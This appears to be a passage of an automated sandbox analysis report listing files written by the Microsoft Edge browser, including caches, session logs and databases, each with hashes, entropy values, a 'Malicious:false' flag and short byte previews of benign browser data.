                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):114579
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.580423533140749
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekEM8l:J9LyxPXfOxr1lMe1nL/5L/TXE6n7d2
                                                                                                                                                                                                                                                                                                      MD5:86A0484A575FE1A383EFF3784A522331
                                                                                                                                                                                                                                                                                                      SHA1:2D42A951494B5AD6851BB4CD777F03FBE5B1CBFA
                                                                                                                                                                                                                                                                                                      SHA-256:C62A6635BE5451A7A8B42931582386B645E97FFD9CE16A8E57B305EB58CF8F24
                                                                                                                                                                                                                                                                                                      SHA-512:C913132A5F4F427B1C73844DED5D8D70AAFF21A4511EA90013211CE397B61A281A9400051CC7944361659F9B061B39D98FA699C9F0D67556198DCF78FCBAA7C5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):189105
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.387346522796816
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:A31DE1D1Qnwe9qUp/b4HL/B2TwD0vMsc2GZ2OhUlBL/:wnweLp/ML/4s3se+/
                                                                                                                                                                                                                                                                                                      MD5:6A180000A347621290893E39313B582B
                                                                                                                                                                                                                                                                                                      SHA1:EDAA780D7ABC7FB987F84B214475FC03193777E8
                                                                                                                                                                                                                                                                                                      SHA-256:A0FDA6BC9A8596E84643739E55C3529EF884BC99C76FB5F6A77CCB72F1D295D3
                                                                                                                                                                                                                                                                                                      SHA-512:662944FA33A9CD42556E1F9009D59D6E5CACC2F2E93EE9E9C4F508A03B922701D4862089205BFB03F46064B186D0E11A43EDAC26C0D14A29DAF9D6E8A77DA732
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0...../...............R.......yTX........,T.8..`,.....L`.....,T...`......L`......RcRH6$....exports...Rc*.......module....Rc..ab....define....Rb*xYH....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.......{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:J70XAyXl/lYV/lxEstllQ89iln:t0QKYWs+89G
                                                                                                                                                                                                                                                                                                      MD5:FB3C96D4C105FB3565F392FC8E2AC4E2
                                                                                                                                                                                                                                                                                                      SHA1:B243E50A1545B1E0F1790D87326F44B98D27D2D0
                                                                                                                                                                                                                                                                                                      SHA-256:B2FEFFE79C98C49F781171B4B45EE8F6A4B1FA9FB6A047885C317614AD557EE3
                                                                                                                                                                                                                                                                                                      SHA-512:B526C612CD6BFFE35F5CC61A18F282F2275CB4B53BB557C59341491154278DD8E66F0D386B69FFDE2BE454A1ED7CD93F1CA2ECB8E1752AC53F566FA72FD19E5F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:@...<..oy retne.........................X....,................+...../.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:J70XAyXl/lYV/lxEstllQ89iln:t0QKYWs+89G
                                                                                                                                                                                                                                                                                                      MD5:FB3C96D4C105FB3565F392FC8E2AC4E2
                                                                                                                                                                                                                                                                                                      SHA1:B243E50A1545B1E0F1790D87326F44B98D27D2D0
                                                                                                                                                                                                                                                                                                      SHA-256:B2FEFFE79C98C49F781171B4B45EE8F6A4B1FA9FB6A047885C317614AD557EE3
                                                                                                                                                                                                                                                                                                      SHA-512:B526C612CD6BFFE35F5CC61A18F282F2275CB4B53BB557C59341491154278DD8E66F0D386B69FFDE2BE454A1ED7CD93F1CA2ECB8E1752AC53F566FA72FD19E5F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:@...<..oy retne.........................X....,................+...../.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4b0af.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:J70XAyXl/lYV/lxEstllQ89iln:t0QKYWs+89G
                                                                                                                                                                                                                                                                                                      MD5:FB3C96D4C105FB3565F392FC8E2AC4E2
                                                                                                                                                                                                                                                                                                      SHA1:B243E50A1545B1E0F1790D87326F44B98D27D2D0
                                                                                                                                                                                                                                                                                                      SHA-256:B2FEFFE79C98C49F781171B4B45EE8F6A4B1FA9FB6A047885C317614AD557EE3
                                                                                                                                                                                                                                                                                                      SHA-512:B526C612CD6BFFE35F5CC61A18F282F2275CB4B53BB557C59341491154278DD8E66F0D386B69FFDE2BE454A1ED7CD93F1CA2ECB8E1752AC53F566FA72FD19E5F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:@...<..oy retne.........................X....,................+...../.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):7673
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.3735971647289937
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:X6n78mYhpIyhai0vU+5YPm1U9X3+MKikLl9iSr/ShiYWOtM:K4mYhpHhaioU9X3+TBLl9iSr63WOtM
                                                                                                                                                                                                                                                                                                      MD5:85D4013414EB0259ED26E8A427D49C44
                                                                                                                                                                                                                                                                                                      SHA1:CFB09412516F3326B511464FF24A5388EB0F102D
                                                                                                                                                                                                                                                                                                      SHA-256:F8DDBDF2B1579E54226DFE0C0EE0928344CF3898F2B3F453C680DEF6EDF423C2
                                                                                                                                                                                                                                                                                                      SHA-512:9A2A6ADB62E99BD7F503A7F0B8C3525724BAE741FC6C21805FEEAE14E4D9A43283D785FBE868BF216A4FA06BE1418CEF7779F0197F81C4CB98570B1F6F787549
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................hGLb................next-map-id.1.Cnamespace-972c3832_33b7_4265_90b1_f278fa5b6c01-https://ntp.msn.com/.0.K..................map-0-shd_sweeper.9{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.p.r.g.-.h.p.-.h.a.s.p.o.l.l.,.p.r.g.-.1.s.w.-.c.n.h.o.r.o.-.c.,.p.r.g.-.e.c.p.s.b.h.v.,.a.d.s.-.c.f.v.4.,.p.r.g.-.m.s.n.-.g.l.s.b.i.d.m.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.b.g.t.a.s.k.t.h.r.o.t.c.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.p.c.,.p.r.g.-.1.s.w.-.s.a.-.u.i.e.n.i.c.h.e.t.5.b.,.p.r.g.-.1.s.w.-.s.a.-.w.e.b.r.v.s.c.,.p.r.g.-.1.s.w.-.s.a.-.s.p.6.-.t.c.c.,.p.r.g.-.1.s.w.-.c.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.146060351411069
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOvq2PN723oH+TcwtrQMxIFUt8sOeYZmw+sOeUkwON723oH+TcwtrQMFLJ:xUvVaYebCFUt8s+/+sm5OaYebtJ
                                                                                                                                                                                                                                                                                                      MD5:C3CBEEE5CCEBC5CD190251C8B4E97399
                                                                                                                                                                                                                                                                                                      SHA1:4B208745EC76DD2C02CFEA7ABCABF39F2C96625F
                                                                                                                                                                                                                                                                                                      SHA-256:4FCAFBF3FB6ABF25A2472499CE08334DAACF5F6FFDDE5672E25FCB9CF7826F71
                                                                                                                                                                                                                                                                                                      SHA-512:8BAC6ABD16D2682FEC467D6B13927A4EF522E1AE67B4FED559D4E56513BD799D6567E5CBE3CC69227B53C8EBDD6676C1B653F2AA9CEA49CD644372E854231006
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.549 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-11:14:57.623 640 Recovering log #3.2024/12/23-11:14:57.627 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.146060351411069
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOvq2PN723oH+TcwtrQMxIFUt8sOeYZmw+sOeUkwON723oH+TcwtrQMFLJ:xUvVaYebCFUt8s+/+sm5OaYebtJ
                                                                                                                                                                                                                                                                                                      MD5:C3CBEEE5CCEBC5CD190251C8B4E97399
                                                                                                                                                                                                                                                                                                      SHA1:4B208745EC76DD2C02CFEA7ABCABF39F2C96625F
                                                                                                                                                                                                                                                                                                      SHA-256:4FCAFBF3FB6ABF25A2472499CE08334DAACF5F6FFDDE5672E25FCB9CF7826F71
                                                                                                                                                                                                                                                                                                      SHA-512:8BAC6ABD16D2682FEC467D6B13927A4EF522E1AE67B4FED559D4E56513BD799D6567E5CBE3CC69227B53C8EBDD6676C1B653F2AA9CEA49CD644372E854231006
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.549 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-11:14:57.623 640 Recovering log #3.2024/12/23-11:14:57.627 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379444099049132

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1443
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8229941715192526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:3oln41QgeRZPnwpsAF4unxmtLp3X2amEtG1ChqMglYSmA6fQKkOAM4:3o941QgoPnwzFYLp2FEkChFgHmA64HOp
                                                                                                                                                                                                                                                                                                      MD5:7828D31D66589762EBB1B4BAABA77ABD
                                                                                                                                                                                                                                                                                                      SHA1:50A45403CB66C4A5EEC8333864EC8ADCE683FEA0
                                                                                                                                                                                                                                                                                                      SHA-256:D19600C0B3A53D3C3F71B754D999E80384D38A62E45E5F59868ACFC6CC9512B0
                                                                                                                                                                                                                                                                                                      SHA-512:988925679980B99CA6D04B13445AC4B8C36A7374F3680126E15D0C6A77C209F836C6B8D89E388EBC84E73B2CFE771896D051030416D622795D1293A6854202DB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SNSS........@Sr............@Sr......".@Sr............@Sr........@Sr........@Sr........@Sr....!...@Sr................................@Sr.@Sr1..,....@Sr$...972c3832_33b7_4265_90b1_f278fa5b6c01....@Sr........@Sr....r.$.........@Sr....@Sr........................@Sr....................5..0....@Sr&...{46F3A197-DB49-410A-81B3-94975C835573}......@Sr........@Sr...........................@Sr............@Sr........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........aL.)....aL.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1032058245175005
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHnyq2PN723oH+Tcwt7Uh2ghZIFUt8sOHx1Zmw+sOHteFlRkwON723oH+Tcwt7w:xayvVaYebIhHh2FUt8sax1/+sateF5On
                                                                                                                                                                                                                                                                                                      MD5:F261B5151A3BAB38CB31F32CB45782DC
                                                                                                                                                                                                                                                                                                      SHA1:4ED08A7851ECFFC0BD3DA42CA014F10A37F8BD52
                                                                                                                                                                                                                                                                                                      SHA-256:E4D756464C64EB94CACC38FCBC05796640B949DFEF08DBF36E32E0775A2483F4
                                                                                                                                                                                                                                                                                                      SHA-512:E89D4B0A680FCC9711EB28A1AEAD95F1FC32E6ABF62159A553E4706B81901E6A2A3665E83459771EEA42DF3CD9049ABCA32C442B729E20C89667C0921F0EA09A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.630 1510 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-11:14:56.630 1510 Recovering log #3.2024/12/23-11:14:56.631 1510 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1032058245175005
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHnyq2PN723oH+Tcwt7Uh2ghZIFUt8sOHx1Zmw+sOHteFlRkwON723oH+Tcwt7w:xayvVaYebIhHh2FUt8sax1/+sateF5On
                                                                                                                                                                                                                                                                                                      MD5:F261B5151A3BAB38CB31F32CB45782DC
                                                                                                                                                                                                                                                                                                      SHA1:4ED08A7851ECFFC0BD3DA42CA014F10A37F8BD52
                                                                                                                                                                                                                                                                                                      SHA-256:E4D756464C64EB94CACC38FCBC05796640B949DFEF08DBF36E32E0775A2483F4
                                                                                                                                                                                                                                                                                                      SHA-512:E89D4B0A680FCC9711EB28A1AEAD95F1FC32E6ABF62159A553E4706B81901E6A2A3665E83459771EEA42DF3CD9049ABCA32C442B729E20C89667C0921F0EA09A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.630 1510 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-11:14:56.630 1510 Recovering log #3.2024/12/23-11:14:56.631 1510 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):435
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.262764157865486
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:x8VvVaYebvqBQFUt8s0Hwg/+s/mI5OaYebvqBvJ:q5VaYebvZg8hHwJSOaYebvk
                                                                                                                                                                                                                                                                                                      MD5:679529FB26AD3F27C80F9C0938987ED2
